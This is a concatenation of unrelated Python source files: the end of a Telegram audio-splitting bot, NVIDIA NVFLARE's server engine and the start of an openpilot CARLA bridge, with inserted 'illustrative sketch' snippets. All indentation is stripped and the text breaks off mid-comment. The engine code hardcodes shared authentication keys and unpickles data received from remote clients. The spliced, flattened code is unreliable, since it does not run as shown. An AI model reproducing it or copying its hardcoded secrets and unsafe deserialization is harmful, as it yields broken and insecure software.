logger.exception("El envío ha fallado debido a TelegramError: %s", file_name)
if len(sent_audio_ids) != len(file_parts):
raise FileSentPartiallyError(sent_audio_ids)
return sent_audio_ids
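# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original bot: a minimal standalone
# version of the size-based splitting done in convert_and_split_audio_file()
# above. Each part is written with ffmpeg stream copy, capped by `fs` (output
# file size) and resumed via `ss` (offset probed from the previous part).
# Assumes the ffmpeg-python package plus an ffmpeg binary; the function name
# and the 48 MB default are hypothetical, not taken from the bot.
import os
import ffmpeg

def split_audio_by_size_sketch(path, max_part_bytes=48 * 1000 * 1000):
    """Return a list of .partN files, each roughly capped at max_part_bytes."""
    file_root, file_ext = os.path.splitext(path)
    file_size = os.path.getsize(path)
    if file_size <= max_part_bytes:
        return [path]
    parts_number = file_size // max_part_bytes + 1
    part_size = file_size // parts_number
    file_parts = []
    cur_position = 0.0
    for i in range(parts_number):
        file_part = "{}.part{}{}".format(file_root, i + 1, file_ext)
        ffinput = ffmpeg.input(path)
        if i == parts_number - 1:
            # last part: copy whatever remains after the current offset
            ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position).run()
        else:
            ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position, fs=part_size).run()
            # advance the offset by the duration actually written to this part
            cur_position += float(ffmpeg.probe(file_part)["format"]["duration"])
        file_parts.append(file_part)
    return file_parts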
|
server_engine.py
|
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import logging
import multiprocessing
import os
import pickle
import re
import shlex
import shutil
import subprocess
import sys
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from multiprocessing.connection import Client as CommandClient
from multiprocessing.connection import Listener
from threading import Lock
from typing import Dict, List, Tuple
from nvflare.apis.client import Client
from nvflare.apis.fl_component import FLComponent
from nvflare.apis.fl_constant import (
AdminCommandNames,
FLContextKey,
MachineStatus,
ReservedTopic,
ReturnCode,
RunProcessKey,
ServerCommandKey,
ServerCommandNames,
SnapshotKey,
WorkspaceConstants,
)
from nvflare.apis.fl_context import FLContext, FLContextManager
from nvflare.apis.fl_snapshot import RunSnapshot
from nvflare.apis.impl.job_def_manager import JobDefManagerSpec
from nvflare.apis.shareable import Shareable, make_reply
from nvflare.apis.utils.common_utils import get_open_ports
from nvflare.apis.utils.fl_context_utils import get_serializable_data
from nvflare.apis.workspace import Workspace
from nvflare.fuel.hci.zip_utils import zip_directory_to_bytes
from nvflare.private.admin_defs import Message
from nvflare.private.defs import RequestHeader, TrainingTopic
from nvflare.private.fed.server.server_json_config import ServerJsonConfigurator
from nvflare.private.scheduler_constants import ShareableHeader
from nvflare.widgets.info_collector import InfoCollector
from nvflare.widgets.widget import Widget, WidgetID
from .admin import ClientReply
from .client_manager import ClientManager
from .job_runner import JobRunner
from .run_manager import RunManager
from .server_engine_internal_spec import EngineInfo, RunInfo, ServerEngineInternalSpec
from .server_status import ServerStatus
class ClientConnection:
def __init__(self, client):
self.client = client
def send(self, data):
data = pickle.dumps(data)
self.client.send(data)
def recv(self):
return self.client.recv()
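# ---------------------------------------------------------------------------
# Illustrative sketch, not part of NVFLARE: the parent/child command channel
# used by ServerEngine below is essentially a multiprocessing.connection
# Listener on one end and a Client on the other, exchanging small dicts with a
# command name and a data payload. The port, auth key, helper names and the
# "heartbeat" command string here are placeholders for the example only.
from multiprocessing.connection import Client as _SketchClient
from multiprocessing.connection import Listener as _SketchListener

def _sketch_command_listener(port=50051):
    """Accept one connection and acknowledge the first command received."""
    listener = _SketchListener(("localhost", port), authkey=b"example secret")
    conn = listener.accept()
    try:
        if conn.poll(5.0):
            received = conn.recv()  # e.g. {"command": "heartbeat", "data": {}}
            conn.send({"ack": received.get("command")})
    finally:
        conn.close()
        listener.close()

def _sketch_command_client(port=50051):
    """Connect to the listener above and send a single heartbeat command."""
    conn = _SketchClient(("localhost", port), authkey=b"example secret")
    try:
        conn.send({"command": "heartbeat", "data": {}})
        return conn.recv()  # {"ack": "heartbeat"}
    finally:
        conn.close()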
class ServerEngine(ServerEngineInternalSpec):
def __init__(self, server, args, client_manager: ClientManager, snapshot_persistor, workers=3):
"""Server engine.
Args:
server: server
args: arguments
client_manager (ClientManager): client manager.
snapshot_persistor: persistor used to save and restore run snapshots.
workers: number of worker threads.
"""
# TODO:: clean up the server function / requirement here should be BaseServer
self.server = server
self.args = args
self.run_processes = {}
self.execution_exception_run_processes = {}
self.run_manager = None
self.conf = None
# TODO:: does this class need client manager?
self.client_manager = client_manager
self.widgets = {
WidgetID.INFO_COLLECTOR: InfoCollector(),
# WidgetID.FED_EVENT_RUNNER: ServerFedEventRunner()
}
self.engine_info = EngineInfo()
if workers < 1:
    raise ValueError("workers must be >= 1 but got {}".format(workers))
self.executor = ThreadPoolExecutor(max_workers=workers)
self.lock = Lock()
self.logger = logging.getLogger(self.__class__.__name__)
self.asked_to_stop = False
self.snapshot_persistor = snapshot_persistor
self.parent_conn = None
self.parent_conn_lock = Lock()
self.job_runner = None
self.job_def_manager = None
self.snapshot_lock = multiprocessing.Lock()
def _get_server_app_folder(self):
return WorkspaceConstants.APP_PREFIX + "server"
def _get_client_app_folder(self, client_name):
return WorkspaceConstants.APP_PREFIX + client_name
def _get_run_folder(self, job_id):
return os.path.join(self.args.workspace, WorkspaceConstants.WORKSPACE_PREFIX + str(job_id))
def get_engine_info(self) -> EngineInfo:
self.engine_info.app_names = {}
if bool(self.run_processes):
self.engine_info.status = MachineStatus.STARTED
else:
self.engine_info.status = MachineStatus.STOPPED
for job_id, _ in self.run_processes.items():
run_folder = os.path.join(self.args.workspace, WorkspaceConstants.WORKSPACE_PREFIX + str(job_id))
app_file = os.path.join(run_folder, "fl_app.txt")
if os.path.exists(app_file):
with open(app_file, "r") as f:
self.engine_info.app_names[job_id] = f.readline().strip()
else:
self.engine_info.app_names[job_id] = "?"
return self.engine_info
def get_run_info(self) -> RunInfo:
if self.run_manager:
return self.run_manager.get_run_info()
else:
return None
def create_parent_connection(self, port):
while not self.parent_conn:
try:
address = ("localhost", port)
self.parent_conn = CommandClient(address, authkey="parent process secret password".encode())
except BaseException:
time.sleep(1.0)
pass
threading.Thread(target=self.heartbeat_to_parent, args=[]).start()
def heartbeat_to_parent(self):
while True:
try:
with self.parent_conn_lock:
data = {ServerCommandKey.COMMAND: ServerCommandNames.HEARTBEAT, ServerCommandKey.DATA: {}}
self.parent_conn.send(data)
time.sleep(1.0)
except BaseException:
# The parent process can not be reached. Terminate the child process.
break
# delay for some time to let the wrap-up finish before the child process terminates itself.
time.sleep(30)
os.killpg(os.getpgid(os.getpid()), 9)
def delete_job_id(self, num):
job_id_folder = os.path.join(self.args.workspace, WorkspaceConstants.WORKSPACE_PREFIX + str(num))
if os.path.exists(job_id_folder):
shutil.rmtree(job_id_folder)
return ""
def get_clients(self) -> [Client]:
return list(self.client_manager.get_clients().values())
def validate_clients(self, client_names: List[str]) -> Tuple[List[Client], List[str]]:
return self._get_all_clients_from_inputs(client_names)
def start_app_on_server(self, run_number: str, job_id: str = None, job_clients=None, snapshot=None) -> str:
if run_number in self.run_processes.keys():
return f"Server run_{run_number} already started."
else:
app_root = os.path.join(self._get_run_folder(run_number), self._get_server_app_folder())
if not os.path.exists(app_root):
return "Server app does not exist. Please deploy the server app before starting."
self.engine_info.status = MachineStatus.STARTING
app_custom_folder = ""
if self.server.enable_byoc:
app_custom_folder = os.path.join(app_root, "custom")
open_ports = get_open_ports(2)
self._start_runner_process(
self.args, app_root, run_number, app_custom_folder, open_ports, job_id, job_clients, snapshot
)
threading.Thread(target=self._listen_command, args=(open_ports[0], run_number)).start()
self.engine_info.status = MachineStatus.STARTED
return ""
def _listen_command(self, listen_port, job_id):
address = ("localhost", int(listen_port))
listener = Listener(address, authkey="parent process secret password".encode())
conn = listener.accept()
while job_id in self.run_processes.keys():
clients = self.run_processes.get(job_id).get(RunProcessKey.PARTICIPANTS)
job_id = self.run_processes.get(job_id).get(RunProcessKey.JOB_ID)
try:
if conn.poll(0.1):
received_data = conn.recv()
command = received_data.get(ServerCommandKey.COMMAND)
data = received_data.get(ServerCommandKey.DATA)
if command == ServerCommandNames.GET_CLIENTS:
return_data = {ServerCommandKey.CLIENTS: clients, ServerCommandKey.JOB_ID: job_id}
conn.send(return_data)
elif command == ServerCommandNames.AUX_SEND:
targets = data.get("targets")
topic = data.get("topic")
request = data.get("request")
timeout = data.get("timeout")
fl_ctx = data.get("fl_ctx")
replies = self.aux_send(
targets=targets, topic=topic, request=request, timeout=timeout, fl_ctx=fl_ctx
)
conn.send(replies)
except BaseException as e:
self.logger.warning(f"Failed to process the child process command: {e}", exc_info=True)
def wait_for_complete(self, job_id):
while True:
try:
with self.lock:
command_conn = self.get_command_conn(job_id)
if command_conn:
data = {ServerCommandKey.COMMAND: ServerCommandNames.HEARTBEAT, ServerCommandKey.DATA: {}}
command_conn.send(data)
time.sleep(1.0)
except BaseException:
with self.lock:
run_process_info = self.run_processes.pop(job_id)
return_code = run_process_info[RunProcessKey.CHILD_PROCESS].poll()
# if the process exited with an execution exception
if return_code and return_code != 0:
self.execution_exception_run_processes[job_id] = run_process_info
self.engine_info.status = MachineStatus.STOPPED
break
def _start_runner_process(
self, args, app_root, run_number, app_custom_folder, open_ports, job_id, job_clients, snapshot
):
new_env = os.environ.copy()
if app_custom_folder != "":
new_env["PYTHONPATH"] = new_env.get("PYTHONPATH", "") + os.pathsep + app_custom_folder
listen_port = open_ports[1]
if snapshot:
restore_snapshot = True
else:
restore_snapshot = False
command_options = ""
for t in args.set:
command_options += " " + t
command = (
sys.executable
+ " -m nvflare.private.fed.app.server.runner_process -m "
+ args.workspace
+ " -s fed_server.json -r "
+ app_root
+ " -n "
+ str(run_number)
+ " -p "
+ str(listen_port)
+ " -c "
+ str(open_ports[0])
+ " --set"
+ command_options
+ " print_conf=True restore_snapshot="
+ str(restore_snapshot)
)
# use os.setsid to create new process group ID
process = subprocess.Popen(shlex.split(command, True), preexec_fn=os.setsid, env=new_env)
if not job_id:
job_id = ""
if not job_clients:
job_clients = self.client_manager.clients
with self.lock:
self.run_processes[run_number] = {
RunProcessKey.LISTEN_PORT: listen_port,
RunProcessKey.CONNECTION: None,
RunProcessKey.CHILD_PROCESS: process,
RunProcessKey.JOB_ID: job_id,
RunProcessKey.PARTICIPANTS: job_clients,
}
threading.Thread(target=self.wait_for_complete, args=[run_number]).start()
return process
def get_job_clients(self, client_sites):
job_clients = {}
if client_sites:
for site, dispatch_info in client_sites.items():
client = self.get_client_from_name(site)
if client:
job_clients[client.token] = client
return job_clients
def remove_custom_path(self):
regex = re.compile(".*/run_.*/custom")
custom_paths = list(filter(regex.search, sys.path))
for path in custom_paths:
sys.path.remove(path)
def abort_app_on_clients(self, clients: List[str]) -> str:
status = self.engine_info.status
if status == MachineStatus.STOPPED:
return "Server app has not started."
if status == MachineStatus.STARTING:
return "Server app is starting, please wait for started before abort."
return ""
def abort_app_on_server(self, job_id: str) -> str:
if job_id not in self.run_processes.keys():
return "Server app has not started."
self.logger.info("Abort the server app run.")
try:
with self.lock:
command_conn = self.get_command_conn(job_id)
if command_conn:
data = {ServerCommandKey.COMMAND: AdminCommandNames.ABORT, ServerCommandKey.DATA: {}}
command_conn.send(data)
status_message = command_conn.recv()
self.logger.info(f"Abort server: {status_message}")
except BaseException:
with self.lock:
child_process = self.run_processes.get(job_id, {}).get(RunProcessKey.CHILD_PROCESS, None)
if child_process:
child_process.terminate()
finally:
with self.lock:
self.run_processes.pop(job_id)
self.engine_info.status = MachineStatus.STOPPED
return ""
def check_app_start_readiness(self, job_id: str) -> str:
if job_id not in self.run_processes.keys():
return f"Server app run_{job_id} has not started."
return ""
def shutdown_server(self) -> str:
status = self.server.status
if status == ServerStatus.STARTING:
return "Server app is starting, please wait for started before shutdown."
self.logger.info("FL server shutdown.")
touch_file = os.path.join(self.args.workspace, "shutdown.fl")
_ = self.executor.submit(lambda p: server_shutdown(*p), [self.server, touch_file])
while self.server.status != ServerStatus.SHUTDOWN:
time.sleep(1.0)
return ""
def restart_server(self) -> str:
status = self.server.status
if status == ServerStatus.STARTING:
return "Server is starting, please wait for started before restart."
self.logger.info("FL server restart.")
touch_file = os.path.join(self.args.workspace, "restart.fl")
_ = self.executor.submit(lambda p: server_shutdown(*p), [self.server, touch_file])
while self.server.status != ServerStatus.SHUTDOWN:
time.sleep(1.0)
return ""
def get_widget(self, widget_id: str) -> Widget:
return self.widgets.get(widget_id)
def get_client_name_from_token(self, token: str) -> str:
client = self.server.client_manager.clients.get(token)
if client:
return client.name
else:
return ""
def get_all_clients(self):
return list(self.server.client_manager.clients.keys())
def get_client_from_name(self, client_name):
for c in self.get_clients():
if client_name == c.name:
return c
return None
def _get_all_clients_from_inputs(self, inputs):
clients = []
invalid_inputs = []
for item in inputs:
client = self.client_manager.clients.get(item)
# if item in self.get_all_clients():
if client:
clients.append(client)
else:
client = self.get_client_from_name(item)
if client:
clients.append(client)
else:
invalid_inputs.append(item)
return clients, invalid_inputs
def get_app_data(self, app_name: str) -> Tuple[str, object]:
fullpath_src = os.path.join(self.server.admin_server.file_upload_dir, app_name)
if not os.path.exists(fullpath_src):
return f"App folder '{app_name}' does not exist in staging area.", None
data = zip_directory_to_bytes(fullpath_src, "")
return "", data
def get_app_run_info(self, job_id) -> RunInfo:
run_info = None
try:
with self.lock:
command_conn = self.get_command_conn(job_id)
if command_conn:
data = {ServerCommandKey.COMMAND: ServerCommandNames.GET_RUN_INFO, ServerCommandKey.DATA: {}}
command_conn.send(data)
run_info = command_conn.recv()
except BaseException:
self.logger.error(f"Failed to get_app_run_info from run_{job_id}")
return run_info
def set_run_manager(self, run_manager: RunManager):
self.run_manager = run_manager
for _, widget in self.widgets.items():
self.run_manager.add_handler(widget)
def set_job_runner(self, job_runner: JobRunner, job_manager: JobDefManagerSpec):
self.job_runner = job_runner
self.job_def_manager = job_manager
def set_configurator(self, conf: ServerJsonConfigurator):
if not isinstance(conf, ServerJsonConfigurator):
raise TypeError("conf must be ServerJsonConfigurator but got {}".format(type(conf)))
self.conf = conf
def build_component(self, config_dict):
return self.conf.build_component(config_dict)
def new_context(self) -> FLContext:
if self.run_manager:
return self.run_manager.new_context()
else:
# return FLContext()
return FLContextManager(
engine=self, identity_name=self.server.project_name, job_id="", public_stickers={}, private_stickers={}
).new_context()
def get_component(self, component_id: str) -> object:
return self.run_manager.get_component(component_id)
def fire_event(self, event_type: str, fl_ctx: FLContext):
self.run_manager.fire_event(event_type, fl_ctx)
def get_staging_path_of_app(self, app_name: str) -> str:
return os.path.join(self.server.admin_server.file_upload_dir, app_name)
def deploy_app_to_server(self, run_destination: str, app_name: str, app_staging_path: str) -> str:
return self.deploy_app(run_destination, app_name, WorkspaceConstants.APP_PREFIX + "server")
def get_workspace(self) -> Workspace:
return self.run_manager.get_workspace()
def ask_to_stop(self):
self.asked_to_stop = True
def deploy_app(self, job_id, src, dst):
fullpath_src = os.path.join(self.server.admin_server.file_upload_dir, src)
fullpath_dst = os.path.join(self._get_run_folder(job_id), dst)
if not os.path.exists(fullpath_src):
return f"App folder '{src}' does not exist in staging area."
if os.path.exists(fullpath_dst):
shutil.rmtree(fullpath_dst)
shutil.copytree(fullpath_src, fullpath_dst)
app_file = os.path.join(self._get_run_folder(job_id), "fl_app.txt")
if os.path.exists(app_file):
os.remove(app_file)
with open(app_file, "wt") as f:
f.write(f"{src}")
return ""
def remove_clients(self, clients: List[str]) -> str:
for client in clients:
self._remove_dead_client(client)
return ""
def _remove_dead_client(self, token):
_ = self.server.client_manager.remove_client(token)
self.server.remove_client_data(token)
if self.server.admin_server:
self.server.admin_server.client_dead(token)
def register_aux_message_handler(self, topic: str, message_handle_func):
self.run_manager.aux_runner.register_aux_message_handler(topic, message_handle_func)
def send_aux_request(self, targets: [], topic: str, request: Shareable, timeout: float, fl_ctx: FLContext) -> dict:
try:
if not targets:
self.sync_clients_from_main_process()
targets = []
for t in self.get_clients():
targets.append(t.name)
if targets:
return self.run_manager.aux_runner.send_aux_request(
targets=targets, topic=topic, request=request, timeout=timeout, fl_ctx=fl_ctx
)
else:
return {}
except Exception as e:
self.logger.error(f"Failed to send the aux_message: {topic} with exception: {e}.")
def sync_clients_from_main_process(self):
with self.parent_conn_lock:
data = {ServerCommandKey.COMMAND: ServerCommandNames.GET_CLIENTS, ServerCommandKey.DATA: {}}
self.parent_conn.send(data)
return_data = self.parent_conn.recv()
clients = return_data.get(ServerCommandKey.CLIENTS)
self.client_manager.clients = clients
def parent_aux_send(self, targets: [], topic: str, request: Shareable, timeout: float, fl_ctx: FLContext) -> dict:
with self.parent_conn_lock:
data = {
ServerCommandKey.COMMAND: ServerCommandNames.AUX_SEND,
ServerCommandKey.DATA: {
"targets": targets,
"topic": topic,
"request": request,
"timeout": timeout,
"fl_ctx": get_serializable_data(fl_ctx),
},
}
self.parent_conn.send(data)
return_data = self.parent_conn.recv()
return return_data
def aux_send(self, targets: [], topic: str, request: Shareable, timeout: float, fl_ctx: FLContext) -> dict:
# Send the aux messages through admin_server
request.set_peer_props(fl_ctx.get_all_public_props())
message = Message(topic=ReservedTopic.AUX_COMMAND, body=pickle.dumps(request))
message.set_header(RequestHeader.JOB_ID, str(fl_ctx.get_prop(FLContextKey.CURRENT_RUN)))
requests = {}
for n in targets:
requests.update({n: message})
replies = self.server.admin_server.send_requests(requests, timeout_secs=timeout)
results = {}
for r in replies:
client_name = self.get_client_name_from_token(r.client_token)
if r.reply:
try:
results[client_name] = pickle.loads(r.reply.body)
except BaseException:
results[client_name] = make_reply(ReturnCode.COMMUNICATION_ERROR)
self.logger.error(
f"Received unexpected reply from client: {client_name}, "
f"message body:{r.reply.body} processing topic:{topic}"
)
else:
results[client_name] = None
return results
def get_command_conn(self, job_id):
# this function needs to be called while holding self.lock
port = self.run_processes.get(job_id, {}).get(RunProcessKey.LISTEN_PORT)
command_conn = self.run_processes.get(job_id, {}).get(RunProcessKey.CONNECTION, None)
if not command_conn:
try:
address = ("localhost", port)
command_conn = CommandClient(address, authkey="client process secret password".encode())
command_conn = ClientConnection(command_conn)
self.run_processes[job_id][RunProcessKey.CONNECTION] = command_conn
except Exception:
pass
return command_conn
def persist_components(self, fl_ctx: FLContext, completed: bool):
# Call the State Persistor to persist all the component states
# 1. call every component to generate the component states data
# Make sure to include the current round number
# 2. call persistence API to save the component states
try:
job_id = fl_ctx.get_job_id()
snapshot = RunSnapshot(job_id)
for component_id, component in self.run_manager.components.items():
if isinstance(component, FLComponent):
snapshot.set_component_snapshot(
component_id=component_id, component_state=component.get_persist_state(fl_ctx)
)
snapshot.set_component_snapshot(
component_id=SnapshotKey.FL_CONTEXT, component_state=copy.deepcopy(get_serializable_data(fl_ctx).props)
)
workspace = fl_ctx.get_prop(FLContextKey.WORKSPACE_OBJECT)
data = zip_directory_to_bytes(workspace.get_run_dir(fl_ctx.get_prop(FLContextKey.CURRENT_RUN)), "")
snapshot.set_component_snapshot(component_id=SnapshotKey.WORKSPACE, component_state={"content": data})
job_info = fl_ctx.get_prop(FLContextKey.JOB_INFO)
if not job_info:
with self.parent_conn_lock:
data = {ServerCommandKey.COMMAND: ServerCommandNames.GET_CLIENTS, ServerCommandKey.DATA: {}}
self.parent_conn.send(data)
return_data = self.parent_conn.recv()
job_id = return_data.get(ServerCommandKey.JOB_ID)
job_clients = return_data.get(ServerCommandKey.CLIENTS)
fl_ctx.set_prop(FLContextKey.JOB_INFO, (job_id, job_clients))
else:
(job_id, job_clients) = job_info
snapshot.set_component_snapshot(
component_id=SnapshotKey.JOB_INFO,
component_state={SnapshotKey.JOB_CLIENTS: job_clients, SnapshotKey.JOB_ID: job_id},
)
snapshot.completed = completed
self.server.snapshot_location = self.snapshot_persistor.save(snapshot=snapshot)
if not completed:
self.logger.info(f"persist the snapshot to: {self.server.snapshot_location}")
else:
self.logger.info(f"The snapshot: {self.server.snapshot_location} has been removed.")
except BaseException as e:
self.logger.error(f"Failed to persist the components. {str(e)}")
def restore_components(self, snapshot: RunSnapshot, fl_ctx: FLContext):
for component_id, component in self.run_manager.components.items():
component.restore(snapshot.get_component_snapshot(component_id=component_id), fl_ctx)
fl_ctx.props.update(snapshot.get_component_snapshot(component_id=SnapshotKey.FL_CONTEXT))
def dispatch(self, topic: str, request: Shareable, fl_ctx: FLContext) -> Shareable:
return self.run_manager.aux_runner.dispatch(topic=topic, request=request, fl_ctx=fl_ctx)
def show_stats(self, job_id):
stats = None
try:
with self.lock:
command_conn = self.get_command_conn(job_id)
if command_conn:
data = {ServerCommandKey.COMMAND: ServerCommandNames.SHOW_STATS, ServerCommandKey.DATA: {}}
command_conn.send(data)
stats = command_conn.recv()
except BaseException:
self.logger.error(f"Failed to get_stats from run_{job_id}")
return stats
def get_errors(self, job_id):
stats = None
try:
with self.lock:
command_conn = self.get_command_conn(job_id)
if command_conn:
data = {ServerCommandKey.COMMAND: ServerCommandNames.GET_ERRORS, ServerCommandKey.DATA: {}}
command_conn.send(data)
stats = command_conn.recv()
except BaseException:
self.logger.error(f"Failed to get_stats from run_{job_id}")
return stats
def _send_admin_requests(self, requests, timeout_secs=10) -> List[ClientReply]:
return self.server.admin_server.send_requests(requests, timeout_secs=timeout_secs)
def check_client_resources(self, resource_reqs) -> Dict[str, Tuple[bool, str]]:
requests = {}
for site_name, resource_requirements in resource_reqs.items():
# assume server resource is unlimited
if site_name == "server":
continue
request = Message(topic=TrainingTopic.CHECK_RESOURCE, body=pickle.dumps(resource_requirements))
client = self.get_client_from_name(site_name)
if client:
requests.update({client.token: request})
replies = []
if requests:
replies = self._send_admin_requests(requests, 15)
result = {}
for r in replies:
site_name = self.get_client_name_from_token(r.client_token)
if r.reply:
resp = pickle.loads(r.reply.body)
result[site_name] = (
resp.get_header(ShareableHeader.CHECK_RESOURCE_RESULT, False),
resp.get_header(ShareableHeader.RESOURCE_RESERVE_TOKEN, ""),
)
else:
result[site_name] = (False, "")
return result
def cancel_client_resources(
self, resource_check_results: Dict[str, Tuple[bool, str]], resource_reqs: Dict[str, dict]
):
requests = {}
for site_name, result in resource_check_results.items():
check_result, token = result
if check_result and token:
resource_requirements = resource_reqs[site_name]
request = Message(topic=TrainingTopic.CANCEL_RESOURCE, body=pickle.dumps(resource_requirements))
request.set_header(ShareableHeader.RESOURCE_RESERVE_TOKEN, token)
client = self.get_client_from_name(site_name)
if client:
requests.update({client.token: request})
if requests:
_ = self._send_admin_requests(requests)
def start_client_job(self, job_id, client_sites):
requests = {}
for site, dispatch_info in client_sites.items():
resource_requirement = dispatch_info.resource_requirements
token = dispatch_info.token
request = Message(topic=TrainingTopic.START_JOB, body=pickle.dumps(resource_requirement))
request.set_header(RequestHeader.JOB_ID, job_id)
request.set_header(ShareableHeader.RESOURCE_RESERVE_TOKEN, token)
client = self.get_client_from_name(site)
if client:
requests.update({client.token: request})
replies = []
if requests:
replies = self._send_admin_requests(requests, timeout_secs=20)
return replies
def stop_all_jobs(self):
fl_ctx = self.new_context()
self.job_runner.stop_all_runs(fl_ctx)
def close(self):
self.executor.shutdown()
def server_shutdown(server, touch_file):
with open(touch_file, "a"):
os.utime(touch_file, None)
try:
server.fl_shutdown()
server.admin_server.stop()
time.sleep(3.0)
finally:
server.status = ServerStatus.SHUTDOWN
sys.exit(2)
def copy_new_server_properties(server, new_server):
# server.model_manager = new_server.model_manager
# server.model_saver = new_server.model_saver
server.builder = new_server.builder
server.wait_after_min_clients = new_server.wait_after_min_clients
server.outbound_filters = new_server.outbound_filters
server.inbound_filters = new_server.inbound_filters
server.cmd_modules = new_server.cmd_modules
server.processors = new_server.processors
# server.task_name = new_server.task_name
server.min_num_clients = new_server.min_num_clients
server.max_num_clients = new_server.max_num_clients
server.current_round = new_server.current_round
server.num_rounds = new_server.num_rounds
server.start_round = new_server.start_round
# server.heart_beat_timeout = new_server.heart_beat_timeout
# server.handlers = new_server.handlers
# clients = server.client_manager.clients
# server.client_manager = new_server.client_manager
# server.client_manager.clients = clients
server.client_manager.min_num_clients = new_server.client_manager.min_num_clients
server.client_manager.max_num_clients = new_server.client_manager.max_num_clients
server.client_manager.logger = new_server.client_manager.logger
server.client_manager.logger.disabled = False
server.reset_tokens()
server.contributed_clients.clear()
# server.accumulator.clear()
server.fl_ctx = new_server.fl_ctx
server.controller = new_server.controller
# server.model_aggregator = new_server.model_aggregator
# server.model_saver = new_server.model_saver
# server.shareable_generator = new_server.shareable_generator
def set_up_run_config(server, conf):
server.heart_beat_timeout = conf.heartbeat_timeout
server.runner_config = conf.runner_config
server.handlers = conf.handlers
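# ---------------------------------------------------------------------------
# Illustrative sketch, not part of NVFLARE: _start_runner_process() above
# builds the child command as one concatenated string and tokenizes it with
# shlex.split(). An equivalent spawn, assuming the same runner module and
# arguments, can assemble the argv list directly and avoid quoting pitfalls.
# The helper name and default values below are placeholders for the example.
import os
import subprocess
import sys

def _sketch_spawn_runner(workspace, app_root, run_number, listen_port, command_port,
                         set_options=(), restore_snapshot=False):
    command = [
        sys.executable, "-m", "nvflare.private.fed.app.server.runner_process",
        "-m", workspace,
        "-s", "fed_server.json",
        "-r", app_root,
        "-n", str(run_number),
        "-p", str(listen_port),
        "-c", str(command_port),
        "--set", *set_options,
        "print_conf=True",
        "restore_snapshot=" + str(restore_snapshot),
    ]
    # os.setsid puts the child into its own process group, as in the original code
    return subprocess.Popen(command, preexec_fn=os.setsid, env=os.environ.copy())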
|
bridge.py
|
#!/usr/bin/env python3
import argparse
import math
import threading
import time
import os
from multiprocessing import Process, Queue
from typing import Any
import carla # pylint: disable=import-error
import numpy as np
import pyopencl as cl
import pyopencl.array as cl_array
from lib.can import can_function
import cereal.messaging as messaging
from cereal import log
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
from common.basedir import BASEDIR
from common.numpy_fast import clip
from common.params import Params
from common.realtime import DT_DMON, Ratekeeper
from selfdrive.car.honda.values import CruiseButtons
from selfdrive.test.helpers import set_params_enabled
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--joystick', action='store_true')
parser.add_argument('--low_quality', action='store_true')
parser.add_argument('--town', type=str, default='Town04_Opt')
parser.add_argument('--spawn_point', dest='num_selected_spawn_point', type=int, default=16)
args = parser.parse_args()
W, H = 1928, 1208
REPEAT_COUNTER = 5
PRINT_DECIMATION = 100
STEER_RATIO = 15.
pm = messaging.PubMaster(['roadCameraState', 'sensorEvents', 'can', "gpsLocationExternal"])
sm = messaging.SubMaster(['carControl', 'controlsState'])
class VehicleState:
def __init__(self):
self.speed = 0
self.angle = 0
self.bearing_deg = 0.0
self.vel = carla.Vector3D()
self.cruise_button = 0
self.is_engaged = False
def steer_rate_limit(old, new):
# Rate limiting to 0.5 degrees per step
limit = 0.5
if new > old + limit:
return old + limit
elif new < old - limit:
return old - limit
else:
return new
class Camerad:
def __init__(self):
self.frame_id = 0
self.vipc_server = VisionIpcServer("camerad")
# TODO: remove RGB buffers once the last RGB vipc subscriber is removed
self.vipc_server.create_buffers(VisionStreamType.VISION_STREAM_RGB_BACK, 4, True, W, H)
self.vipc_server.create_buffers(VisionStreamType.VISION_STREAM_ROAD, 40, False, W, H)
self.vipc_server.start_listener()
# set up for pyopencl rgb to yuv conversion
self.ctx = cl.create_some_context()
self.queue = cl.CommandQueue(self.ctx)
cl_arg = f" -DHEIGHT={H} -DWIDTH={W} -DRGB_STRIDE={W*3} -DUV_WIDTH={W // 2} -DUV_HEIGHT={H // 2} -DRGB_SIZE={W * H} -DCL_DEBUG "
# TODO: move rgb_to_yuv.cl to local dir once the frame stream camera is removed
kernel_fn = os.path.join(BASEDIR, "selfdrive", "camerad", "transforms", "rgb_to_yuv.cl")
prg = cl.Program(self.ctx, open(kernel_fn).read()).build(cl_arg)
self.krnl = prg.rgb_to_yuv
self.Wdiv4 = W // 4 if (W % 4 == 0) else (W + (4 - W % 4)) // 4
self.Hdiv4 = H // 4 if (H % 4 == 0) else (H + (4 - H % 4)) // 4
def cam_callback(self, image):
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0, 1, 2]].copy()
# convert RGB frame to YUV
rgb = np.reshape(img, (H, W * 3))
rgb_cl = cl_array.to_device(self.queue, rgb)
yuv_cl = cl_array.empty_like(rgb_cl)
self.krnl(self.queue, (np.int32(self.Wdiv4), np.int32(self.Hdiv4)), None, rgb_cl.data, yuv_cl.data).wait()
yuv = np.resize(yuv_cl.get(), np.int32(rgb.size / 2))
eof = self.frame_id * 0.05
# TODO: remove RGB send once the last RGB vipc subscriber is removed
self.vipc_server.send(VisionStreamType.VISION_STREAM_RGB_BACK, img.tobytes(), self.frame_id, eof, eof)
self.vipc_server.send(VisionStreamType.VISION_STREAM_ROAD, yuv.data.tobytes(), self.frame_id, eof, eof)
dat = messaging.new_message('roadCameraState')
dat.roadCameraState = {
"frameId": image.frame,
"transform": [1.0, 0.0, 0.0,
0.0, 1.0, 0.0,
0.0, 0.0, 1.0]
}
pm.send('roadCameraState', dat)
self.frame_id += 1
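# ---------------------------------------------------------------------------
# Illustrative note, not part of the bridge: Camerad's Wdiv4/Hdiv4 above are
# simply "round the dimension up to the next multiple of 4, then divide by 4",
# i.e. the global work size handed to the rgb_to_yuv kernel. A ceil-division
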